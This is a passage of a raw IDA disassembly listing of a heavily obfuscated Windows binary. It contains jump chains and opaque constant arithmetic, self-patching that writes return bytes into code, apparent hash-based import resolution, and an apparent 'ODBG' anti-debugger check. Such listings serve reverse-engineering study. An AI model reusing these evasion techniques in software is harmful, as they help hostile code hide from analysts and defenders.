		jmp	loc_43C164
; END OF FUNCTION CHUNK	FOR sub_43D531
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4512A0

loc_449BCF:				; CODE XREF: sub_4512A0:loc_44B37Cj
		push	6BD3D1DCh
		pop	eax
		and	eax, 0E5FCB015h
		add	eax, 9E740BD5h
		xchg	eax, [esp+4+var_4]
		jmp	sub_44DE0A
; END OF FUNCTION CHUNK	FOR sub_4512A0
; ---------------------------------------------------------------------------
		push	offset sub_44B9B4
		jmp	locret_445FA4
; ---------------------------------------------------------------------------
		test	eax, eax
		jl	loc_458EC6
		jmp	loc_45B217
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4425F0

loc_449C00:				; CODE XREF: sub_4425F0+EC50j
		xchg	ebp, [esp+8+var_8]
		mov	edx, ebp
		pop	ebp
		push	offset loc_447679
		jmp	nullsub_187
; END OF FUNCTION CHUNK	FOR sub_4425F0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4403D4

loc_449C10:				; CODE XREF: sub_4403D4-1653j
					; hvvrg7ie:004504FBj
		add	edi, 10038141h
		xchg	edi, [esp+0]
		lea	eax, [ebp+var_64]
		push	eax
		jmp	loc_44024B
; END OF FUNCTION CHUNK	FOR sub_4403D4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4465A6

loc_449C22:				; CODE XREF: sub_4465A6+B76Ej
					; hvvrg7ie:loc_454F1Fj
		jnz	loc_446F0F
		jmp	loc_450FDE
; END OF FUNCTION CHUNK	FOR sub_4465A6

; =============== S U B	R O U T	I N E =======================================



sub_449C2D	proc near		; DATA XREF: sub_43D285+1B296o

; FUNCTION CHUNK AT 0043AEC9 SIZE 00000005 BYTES

		add	eax, 0F5AE42DEh
		xchg	eax, [esp+0]
		jmp	loc_43AEC9
sub_449C2D	endp

; ---------------------------------------------------------------------------
		db 85h
		dd 0FDD9E9DDh, 6853FFFEh, 452766h, 9442E9h
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F8F2

loc_449C4D:				; CODE XREF: sub_44F8F2-14D8Aj
		jz	loc_44D945
		jmp	loc_454AF0
; END OF FUNCTION CHUNK	FOR sub_44F8F2

; =============== S U B	R O U T	I N E =======================================



sub_449C58	proc near		; CODE XREF: sub_454789:loc_4489DFp
					; hvvrg7ie:004562ABj

; FUNCTION CHUNK AT 0044C67A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455004 SIZE 00000019 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		add	eax, 0BAD27E62h
		add	eax, ebp
		add	eax, 58C44FEBh
		jmp	loc_44C67A
sub_449C58	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450F97

loc_449C6F:				; CODE XREF: sub_450F97-9CDDj
		cmp	esi, ebp
		jmp	loc_448A6D
; END OF FUNCTION CHUNK	FOR sub_450F97
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445DC4

loc_449C76:				; CODE XREF: sub_445DC4-1964j
		mov	[ebx], eax
		pop	ebx
		lea	eax, loc_454BEF
		mov	byte ptr [eax],	0C3h
		jmp	loc_454BEF
; ---------------------------------------------------------------------------

loc_449C87:				; CODE XREF: sub_445DC4:loc_454BEFj
		pop	edx
		push	offset loc_43BC5B
		jmp	loc_440D49
; END OF FUNCTION CHUNK	FOR sub_445DC4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453B74

loc_449C92:				; CODE XREF: sub_453B74:loc_452BF0j
		xor	eax, 0EBB39944h
		call	sub_44059F
		mov	ds:off_41D028, eax
		lea	eax, loc_44CC74
		mov	byte ptr [eax],	0C3h
		jmp	loc_44CC74
; END OF FUNCTION CHUNK	FOR sub_453B74

; =============== S U B	R O U T	I N E =======================================



sub_449CB1	proc near		; CODE XREF: sub_4176BD+14p
					; sub_41A28F+90p ...

var_8		= dword	ptr -8

; FUNCTION CHUNK AT 0043C765 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004419B6 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 004436D6 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00444E58 SIZE 00000026 BYTES
; FUNCTION CHUNK AT 004458A7 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044B4E0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C619 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00455076 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455B72 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00456CE5 SIZE 00000029 BYTES
; FUNCTION CHUNK AT 0045711A SIZE 0000000D BYTES

		jb	loc_4436D6
		jmp	loc_44B4E0
sub_449CB1	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_449CBC:				; CODE XREF: hvvrg7ie:004469B7j
		jnz	nullsub_436
		and	esi, 9A21CD67h

; =============== S U B	R O U T	I N E =======================================



sub_449CC8	proc near		; CODE XREF: sub_456763:loc_4471BAp

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043AE9A SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0043DF56 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446245 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0044F8A2 SIZE 00000025 BYTES
; FUNCTION CHUNK AT 0044F9D4 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0044FAB9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452574 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0045273F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00457C8C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004583EC SIZE 0000001E BYTES

		xchg	edi, [esp+0]
		pop	edi
		push	7302F05Bh
		pop	eax
		jmp	loc_44FAB9
sub_449CC8	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4408AE

loc_449CD7:				; CODE XREF: sub_4408AE+A6EFj
		pop	edi
		xor	edi, 0A8BED93Eh
		test	edi, 100000h
		jmp	loc_45397B
; END OF FUNCTION CHUNK	FOR sub_4408AE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442B3C

loc_449CE9:				; CODE XREF: sub_451110-E157j
					; sub_442B3C:loc_449394j
		push	edi
		push	0DA3ECF10h
		pop	edi
		rol	edi, 13h

loc_449CF3:				; CODE XREF: hvvrg7ie:00458EFAj
		add	edi, 87BE160Ah
		xchg	edi, [esp-4+arg_0]
		jmp	loc_44AE61
; END OF FUNCTION CHUNK	FOR sub_442B3C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444F80

loc_449D01:				; CODE XREF: sub_444F80+1C51j
		push	offset sub_43D531
		jmp	loc_439186
; END OF FUNCTION CHUNK	FOR sub_444F80
; ---------------------------------------------------------------------------

loc_449D0B:				; CODE XREF: hvvrg7ie:0043A7AAj
		js	loc_444399
; START	OF FUNCTION CHUNK FOR sub_44E533

loc_449D11:				; CODE XREF: sub_44E533:loc_442291j
		add	eax, 8AE54D4h
		add	eax, ebp
		add	eax, 0F2C5577Bh
		mov	eax, [eax]
		jmp	loc_449628
; END OF FUNCTION CHUNK	FOR sub_44E533
; ---------------------------------------------------------------------------

loc_449D26:				; CODE XREF: hvvrg7ie:loc_44C174j
					; hvvrg7ie:0044C187j
		xor	eax, 0A86CB96h
		test	eax, 40000000h
		jmp	loc_44C7F7
; ---------------------------------------------------------------------------

loc_449D37:				; CODE XREF: hvvrg7ie:0044AE09j
		pop	esi

; =============== S U B	R O U T	I N E =======================================



sub_449D38	proc near		; CODE XREF: sub_4544DD+32C6p

; FUNCTION CHUNK AT 00439598 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043A706 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0044200B SIZE 00000007 BYTES
; FUNCTION CHUNK AT 004438CA SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044797D SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0044A0CB SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0044A247 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044A954 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044FA53 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00455EC5 SIZE 0000000B BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		mov	edx, ds:dword_4578C0
		mov	edx, [edx]
		sub	edx, eax
		mov	ecx, [ebp-4]
		mov	eax, 1
		jmp	loc_43A706
sub_449D38	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_449D53	proc near		; DATA XREF: sub_4454E1+12F3o

; FUNCTION CHUNK AT 00439075 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004429E5 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044AEAA SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00450682 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452618 SIZE 00000017 BYTES

		mov	eax, [eax+0Ch]

loc_449D56:				; CODE XREF: sub_43C00F+Bj
					; sub_45A7F7:loc_4581A4j
		jnz	loc_452618
		push	offset loc_4447C1
		jmp	loc_439075
sub_449D53	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442FD1

loc_449D66:				; CODE XREF: sub_442FD1-9955j
		or	ebp, 60693EF4h
		pushf
		jmp	loc_44E31D
; END OF FUNCTION CHUNK	FOR sub_442FD1
; ---------------------------------------------------------------------------

loc_449D72:				; CODE XREF: hvvrg7ie:0044248Fj
		shr	ebp, 0Ah

; =============== S U B	R O U T	I N E =======================================



sub_449D75	proc near		; CODE XREF: sub_43BFE7:loc_43C974p

; FUNCTION CHUNK AT 004460C0 SIZE 0000000A BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		xor	eax, 2779E2C6h
		call	sub_44D171

loc_449D84:				; CODE XREF: sub_45B586+9j
		jmp	loc_4460C0
sub_449D75	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C5D0

loc_449D89:				; CODE XREF: sub_44C5D0+13j
		jmp	loc_439C14
; END OF FUNCTION CHUNK	FOR sub_44C5D0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445DF4

loc_449D8E:				; CODE XREF: sub_445DF4+11j
		jmp	loc_452212
; END OF FUNCTION CHUNK	FOR sub_445DF4
; ---------------------------------------------------------------------------
		mov	edx, 0D3FC5F6Fh
		js	loc_4561FB
		jmp	sub_44E609
; ---------------------------------------------------------------------------
		push	0FA01BD5Bh
		mov	esi, 327CBBECh
		jmp	sub_443345
; ---------------------------------------------------------------------------
		call	nullsub_248
		push	ebx
		push	offset loc_43EB95
		jmp	locret_444EE1

; =============== S U B	R O U T	I N E =======================================



sub_449DC2	proc near		; CODE XREF: sub_43FD5B+9p
					; sub_448BC0+91EAj
		xchg	edi, [esp+0]
		pop	edi
		cmp	byte ptr [ebp-1], 0
		call	sub_448057

loc_449DCF:				; CODE XREF: sub_4469CC+8j
		jmp	nullsub_78
sub_449DC2	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_449DD4:				; CODE XREF: sub_43F227-9D8j
		pop	edx
		pop	eax
		xchg	eax, [esp-10h+arg_C]
		mov	ecx, eax
		pop	eax
		pop	ebp
		jmp	loc_456838
; END OF FUNCTION CHUNK	FOR sub_43F227
; ---------------------------------------------------------------------------
		push	edx
		mov	edx, ebp
		jmp	loc_4441DC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458F33

loc_449DEA:				; CODE XREF: sub_458F33:loc_43E712j
		add	eax, ebp
		add	eax, 4D4C5DE5h
		mov	eax, [eax]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_457696
		jmp	loc_45222D
; END OF FUNCTION CHUNK	FOR sub_458F33

; =============== S U B	R O U T	I N E =======================================



sub_449E02	proc near		; CODE XREF: sub_447DE4-5526p
					; hvvrg7ie:0044F3B8j

; FUNCTION CHUNK AT 00442993 SIZE 00000017 BYTES

		xchg	edx, [esp+0]
		pop	edx
		push	edx
		push	esi
		jmp	loc_442993
sub_449E02	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451DFF

loc_449E0D:				; CODE XREF: sub_451DFF:loc_44EB89j
		push	ecx

loc_449E0E:				; CODE XREF: hvvrg7ie:00450B68j
		push	ebp
		mov	eax, [ebp+arg_0]
		mov	ecx, [eax]
		push	esi
		mov	esi, edi
		jmp	loc_451B66
; END OF FUNCTION CHUNK	FOR sub_451DFF
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_75. PRESS	KEYPAD "+" TO EXPAND]

; =============== S U B	R O U T	I N E =======================================



sub_449E1D	proc near		; DATA XREF: sub_45423F:loc_447473o
		add	edx, 95C79277h
		add	edx, ebp
		add	edx, 0EB588ED6h
		mov	edx, [edx]
		call	sub_440881

loc_449E32:				; CODE XREF: hvvrg7ie:00459A90j
		jmp	sub_446A16
sub_449E1D	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43AE41

loc_449E37:				; CODE XREF: sub_43AE41+974Dj
		jmp	loc_4390F1
; END OF FUNCTION CHUNK	FOR sub_43AE41
; ---------------------------------------------------------------------------

loc_449E3C:				; CODE XREF: hvvrg7ie:004414F1j
		jmp	loc_44B7EA
; ---------------------------------------------------------------------------

loc_449E41:				; CODE XREF: hvvrg7ie:004578AEj
		mov	edi, ecx
		jmp	loc_45AD3C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D574

loc_449E48:				; CODE XREF: sub_43D574:loc_43BDE6j
		mov	[edx], eax
		pop	edx
		lea	eax, sub_43D574
		mov	byte ptr [eax],	0C3h
		jmp	sub_43D574
; END OF FUNCTION CHUNK	FOR sub_43D574

; =============== S U B	R O U T	I N E =======================================



sub_449E59	proc near		; CODE XREF: sub_41A40D+41p
					; sub_41A40D+44p ...

; FUNCTION CHUNK AT 00441EF6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044A2A4 SIZE 00000006 BYTES

		call	sub_44A2AF
		jmp	loc_441EF6
sub_449E59	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D2F8

loc_449E63:				; CODE XREF: sub_43E938+1Dj
					; sub_44D2F8+2C6Ej
		add	eax, 0D2B9A285h
		push	edi
		mov	edi, eax
		xchg	edi, [esp+8+var_8]
		push	3D219D86h
		jmp	loc_442417
; END OF FUNCTION CHUNK	FOR sub_44D2F8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453BBD

loc_449E79:				; CODE XREF: sub_453BBD:loc_446E56j
		jz	loc_449EA4
		jmp	loc_459AC8
; END OF FUNCTION CHUNK	FOR sub_453BBD
; ---------------------------------------------------------------------------
		mov	eax, 78BDA40Ah
		push	ebx
		push	0A16ED56Ch
		pop	ebx
		or	ebx, 9FBF2D6h
		add	ebx, 56449C7Bh
		xchg	ebx, [esp]
		jmp	sub_450C5A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4414F6

loc_449EA4:				; CODE XREF: sub_4414F6:loc_43C6DDj
					; sub_4414F6-4476j ...
		jmp	loc_459BB4
; ---------------------------------------------------------------------------

loc_449EA9:				; CODE XREF: sub_449CC8-EE23j
					; sub_4414F6+96C8j
		pop	ecx
		pop	ebp
		retn
; END OF FUNCTION CHUNK	FOR sub_4414F6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D2F8

loc_449EAC:				; CODE XREF: sub_44D2F8-84F2j
		jmp	loc_44C10C
; END OF FUNCTION CHUNK	FOR sub_44D2F8

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_449EB1	proc near		; CODE XREF: sub_44121E-6EE3j
					; sub_44363B+5p ...

; FUNCTION CHUNK AT 00450A75 SIZE 00000005 BYTES

		push	ebp
		mov	ebp, esp
		push	offset sub_446E8C
		jmp	loc_450A75
sub_449EB1	endp

; ---------------------------------------------------------------------------
		add	ebp, eax
		cmp	ebp, edx
		jmp	loc_442E3C
; ---------------------------------------------------------------------------

loc_449EC7:				; CODE XREF: hvvrg7ie:loc_440270j
		mov	eax, 0CAAB96A5h
		call	sub_44059F
		mov	ds:off_41D024, eax
		lea	eax, sub_448CCA
		mov	byte ptr [eax],	0C3h
		jmp	loc_452328
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448CCA

loc_449EE5:				; CODE XREF: sub_448CCAj
		pop	edx
		jmp	loc_4415FC
; END OF FUNCTION CHUNK	FOR sub_448CCA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43953B

loc_449EEB:				; CODE XREF: sub_43953B:loc_4589C8j
		xchg	eax, [esp+0]
		call	sub_454E54
		mov	eax, 0DD5E106Fh
		push	ebx
		push	0A68ECDEEh
		pop	ebx
		jmp	loc_443B93
; END OF FUNCTION CHUNK	FOR sub_43953B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446D8D

loc_449F04:				; CODE XREF: sub_446D8D:loc_45B131j
		sub	eax, 44AC6FE4h
		xor	eax, 82352A66h
		add	eax, ebp
		push	offset loc_44288A
		jmp	loc_43C177
; END OF FUNCTION CHUNK	FOR sub_446D8D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4595E4

loc_449F1C:				; CODE XREF: sub_4595E4-152E4j
		mov	byte ptr [eax],	0C3h
		jmp	sub_440C05
; END OF FUNCTION CHUNK	FOR sub_4595E4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440C05

loc_449F24:				; CODE XREF: sub_440C05j
		call	sub_43D4D2

loc_449F29:				; CODE XREF: sub_44BF29+9j
		jmp	loc_43B3E0
; END OF FUNCTION CHUNK	FOR sub_440C05
; ---------------------------------------------------------------------------

loc_449F2E:				; CODE XREF: hvvrg7ie:00441359j
		or	ecx, 8EAC585Bh
		test	ecx, 2
		jmp	loc_44C12D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43AC3B

loc_449F3F:				; CODE XREF: sub_43AC3B:loc_44D373j
		push	1DFBBD4Dh
		pop	ecx
		xor	ecx, 0D301746Ah
		and	ecx, 543AA714h
		add	ecx, 0BC0A1E5Bh
		xchg	ecx, [esp-4+arg_0]
		jmp	sub_450C5A
; END OF FUNCTION CHUNK	FOR sub_43AC3B
; ---------------------------------------------------------------------------
		mov	ds:off_41D140, eax
		jmp	loc_45081B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44388C

loc_449F6A:				; CODE XREF: sub_44388C:loc_445297j
		mov	eax, [esi]
		test	eax, 9905F781h
		jmp	loc_43F46C
; END OF FUNCTION CHUNK	FOR sub_44388C
; ---------------------------------------------------------------------------

loc_449F77:				; CODE XREF: hvvrg7ie:0045606Aj
					; hvvrg7ie:0045958Ej
		xor	edi, 5317EF9Ch
		jnz	loc_4412E5
; START	OF FUNCTION CHUNK FOR sub_4465A6

loc_449F83:				; CODE XREF: sub_4465A6+12D9Cj
		jmp	nullsub_361
; END OF FUNCTION CHUNK	FOR sub_4465A6
; ---------------------------------------------------------------------------

loc_449F88:				; CODE XREF: hvvrg7ie:0045557Bj
		jmp	sub_446A16
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C8C7

loc_449F8D:				; CODE XREF: sub_44C8C7-9400j
		jmp	nullsub_481
; END OF FUNCTION CHUNK	FOR sub_44C8C7
; ---------------------------------------------------------------------------
		mov	edi, edx
		jmp	loc_4412DF
; ---------------------------------------------------------------------------

loc_449F99:				; DATA XREF: sub_4584F2+9o
		push	ecx
		push	offset sub_43BDC2
		jmp	locret_455D58
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_449FA4:				; CODE XREF: sub_43F227-5C6Bj
		call	sub_43FA83

loc_449FA9:				; CODE XREF: sub_4500E7+6FDCj
		jmp	loc_4503F1
; END OF FUNCTION CHUNK	FOR sub_43F227
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E128

loc_449FAE:				; CODE XREF: sub_43E128:loc_44B893j
		xor	eax, 3E5CC923h
		call	sub_44989C

loc_449FB9:				; CODE XREF: sub_4584F2+1BD5j
		jmp	loc_44C974
; END OF FUNCTION CHUNK	FOR sub_43E128
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4471E7

loc_449FBE:				; CODE XREF: sub_4471E7+8j
		jmp	nullsub_237
; END OF FUNCTION CHUNK	FOR sub_4471E7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454099

loc_449FC3:				; CODE XREF: sub_454099:loc_44DBB7j
		jz	loc_44027B
		jmp	loc_43F268
; END OF FUNCTION CHUNK	FOR sub_454099
; ---------------------------------------------------------------------------
		jle	loc_4576A8
		jmp	sub_44E159
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D2F8

loc_449FD9:				; CODE XREF: sub_44D2F8:loc_451CA0j
		xor	eax, 0CA229D90h
		add	eax, ebp
		add	eax, 92627F2Ch
		cmp	dword ptr [eax], 4742444Fh
		jz	loc_43BCB4
		jmp	loc_44B657
; END OF FUNCTION CHUNK	FOR sub_44D2F8
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_278. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_449FF9:				; CODE XREF: hvvrg7ie:0044BFE4j
		jmp	loc_44F731
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43AB99

loc_449FFE:				; CODE XREF: sub_43AB99+51B3j
		jmp	nullsub_84
; END OF FUNCTION CHUNK	FOR sub_43AB99
; ---------------------------------------------------------------------------
		push	0A02D7D33h
		pop	eax
		xor	eax, 0D55E093Bh
		call	sub_45868E
; START	OF FUNCTION CHUNK FOR sub_4527A1

loc_44A014:				; CODE XREF: sub_4527A1+3A78j
		jmp	loc_442166
; END OF FUNCTION CHUNK	FOR sub_4527A1
; ---------------------------------------------------------------------------

loc_44A019:				; CODE XREF: hvvrg7ie:0044CEFDj
		jmp	loc_44D10D

; =============== S U B	R O U T	I N E =======================================



sub_44A01E	proc near		; CODE XREF: hvvrg7ie:0044A743j
					; sub_45889B-AA09p

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0044885B SIZE 00000005 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		xchg	ebx, [esp-4+arg_0]
		jmp	loc_44885B
sub_44A01E	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		push	esi
		push	3B535BBBh
		pop	esi
		xor	esi, 0DDF64E49h
		jmp	loc_44D68C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4447D3

loc_44A03C:				; CODE XREF: sub_4447D3+Bj
					; sub_455ACA:loc_456D93j
		xchg	edi, [esp-8+arg_4]
		jmp	sub_450C5A
; END OF FUNCTION CHUNK	FOR sub_4447D3
; ---------------------------------------------------------------------------

loc_44A044:				; CODE XREF: hvvrg7ie:0045441Bj
		mov	eax, [esp]
		call	sub_44680C
; START	OF FUNCTION CHUNK FOR sub_445934

loc_44A04C:				; CODE XREF: sub_445934-222Aj
		jmp	loc_456A4B
; END OF FUNCTION CHUNK	FOR sub_445934
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D47A

loc_44A051:				; CODE XREF: sub_44D47A-CC0Ej
		push	edi
		push	7030C571h
		xchg	ebp, [esp+0]
		mov	edi, ebp
		pop	ebp
		jmp	loc_452B93
; END OF FUNCTION CHUNK	FOR sub_44D47A
; ---------------------------------------------------------------------------

loc_44A062:				; DATA XREF: hvvrg7ie:00454103o
		mov	ds:off_41D10C, eax
		lea	eax, sub_457F50
		mov	byte ptr [eax],	0C3h
		jmp	sub_457F50
; ---------------------------------------------------------------------------
		call	nullsub_61
		jmp	ds:dword_41D110
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44543A

loc_44A081:				; CODE XREF: sub_44543A+DCBj
		add	eax, ebx
		pop	ebx
		mov	eax, [eax]
		and	dword ptr [eax+24h], 7FFFFFFFh
		push	7428926Bh
		pop	eax
		rol	eax, 0Dh
		jmp	loc_44A860
; END OF FUNCTION CHUNK	FOR sub_44543A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44346F

loc_44A09B:				; CODE XREF: sub_44346F-90FAj
		ja	loc_45227C
; END OF FUNCTION CHUNK	FOR sub_44346F
; START	OF FUNCTION CHUNK FOR sub_4413A5

loc_44A0A1:				; CODE XREF: sub_44346F:loc_43BC12j
					; sub_44980B-66C8j ...
		jmp	loc_43B7D1
; ---------------------------------------------------------------------------

loc_44A0A6:				; CODE XREF: sub_4413A5-61D1j
					; sub_44346F+11804j
		pop	ecx
		xchg	esi, [esp-8+arg_0]
		mov	ebp, esi
		jmp	loc_458D26
; END OF FUNCTION CHUNK	FOR sub_4413A5

; =============== S U B	R O U T	I N E =======================================



sub_44A0B1	proc near		; CODE XREF: hvvrg7ie:00457DABj
					; sub_45A7F7:loc_45A809p
		xchg	ecx, [esp+0]
		pop	ecx
		mov	eax, ebx
		pop	ecx
		pop	ebx
		retn
sub_44A0B1	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44398A

loc_44A0BA:				; CODE XREF: sub_44398A-69D1j
		jmp	loc_4478DB
; END OF FUNCTION CHUNK	FOR sub_44398A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44107D

loc_44A0BF:				; CODE XREF: sub_44107D+D374j
					; sub_44107D+EF88j
		mov	eax, ds:dword_45A8A0
		mov	al, [eax]
		jmp	loc_45A971
; END OF FUNCTION CHUNK	FOR sub_44107D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449D38

loc_44A0CB:				; CODE XREF: sub_449D38:loc_44FA58j
		pop	edx
		rol	edx, 9
		sub	edx, 0C6705558h
		or	edx, 29AF949Ch
		test	edx, 2000000h
		jmp	loc_455EC5
; END OF FUNCTION CHUNK	FOR sub_449D38

; =============== S U B	R O U T	I N E =======================================



sub_44A0E6	proc near		; DATA XREF: sub_458591-1CB1Do
		add	edi, 14B0842h
		xchg	edi, [esp+0]
		jmp	nullsub_19
sub_44A0E6	endp

; ---------------------------------------------------------------------------

loc_44A0F4:				; CODE XREF: hvvrg7ie:0043D9A6j
		jz	loc_43FADD
		jmp	loc_4508CC
; ---------------------------------------------------------------------------

loc_44A0FF:				; CODE XREF: hvvrg7ie:loc_44495Dj
		xor	eax, 0F5BB1C97h
		add	eax, 2A88D3B8h
		xchg	eax, [esp]
		jmp	loc_44C79B
; ---------------------------------------------------------------------------

loc_44A113:				; DATA XREF: sub_44C782+Eo
		push	3DF5C357h
		xchg	eax, [esp]
		mov	edi, eax
		pop	eax
		sub	edi, 397A5CD1h
		jmp	loc_45B4A1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E560

loc_44A129:				; CODE XREF: sub_44E560+Fj
		mov	[ebp-4], eax
		mov	eax, [ebp-4]
		mov	al, [eax]
		sub	al, 99h
		push	76B05771h
		pop	edx
		jmp	loc_444D62
; END OF FUNCTION CHUNK	FOR sub_44E560
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4453EC

loc_44A13E:				; CODE XREF: sub_4453EC:loc_43DF9Ej
		jmp	loc_452D06
; END OF FUNCTION CHUNK	FOR sub_4453EC
; ---------------------------------------------------------------------------
		call	sub_4400EE
; START	OF FUNCTION CHUNK FOR sub_43AFB6

loc_44A148:				; CODE XREF: sub_43AFB6:loc_439A4Bj
		mov	esp, ebp
		pop	ebp
		push	ds:dword_45A8B0
		retn
; END OF FUNCTION CHUNK	FOR sub_43AFB6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4529EA

loc_44A152:				; CODE XREF: sub_4529EA:loc_440EADj
		mov	eax, [ebp-1Ch]
		mov	al, [eax]
		jmp	loc_45AF0F
; END OF FUNCTION CHUNK	FOR sub_4529EA

; =============== S U B	R O U T	I N E =======================================



sub_44A15C	proc near		; DATA XREF: hvvrg7ie:0044637Eo

; FUNCTION CHUNK AT 00447E86 SIZE 00000005 BYTES

		add	edi, 0AF154D1Fh
		xchg	edi, [esp+0]
		jmp	loc_447E86
sub_44A15C	endp

; ---------------------------------------------------------------------------
		test	edi, esi
		jmp	loc_45AE6B
; ---------------------------------------------------------------------------
		xor	edx, edi
		jmp	sub_43C2B2
; ---------------------------------------------------------------------------

locret_44A178:				; CODE XREF: hvvrg7ie:0044BF16j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454D23

loc_44A179:				; CODE XREF: sub_454D23-9FA5j
		jmp	loc_43AC81
; END OF FUNCTION CHUNK	FOR sub_454D23
; ---------------------------------------------------------------------------

loc_44A17E:				; CODE XREF: hvvrg7ie:0043FE6Ej
		jmp	loc_4516AE
; ---------------------------------------------------------------------------

loc_44A183:				; CODE XREF: hvvrg7ie:0043A997j
		and	edx, 560E2A2Ch
		xor	edx, 0A4318944h
		js	loc_450A98
		pop	ecx

loc_44A196:				; CODE XREF: hvvrg7ie:loc_43E7CFj
		shl	esi, 1Bh
		jmp	loc_45A10C
; ---------------------------------------------------------------------------

loc_44A19E:				; CODE XREF: hvvrg7ie:0043F55Bj
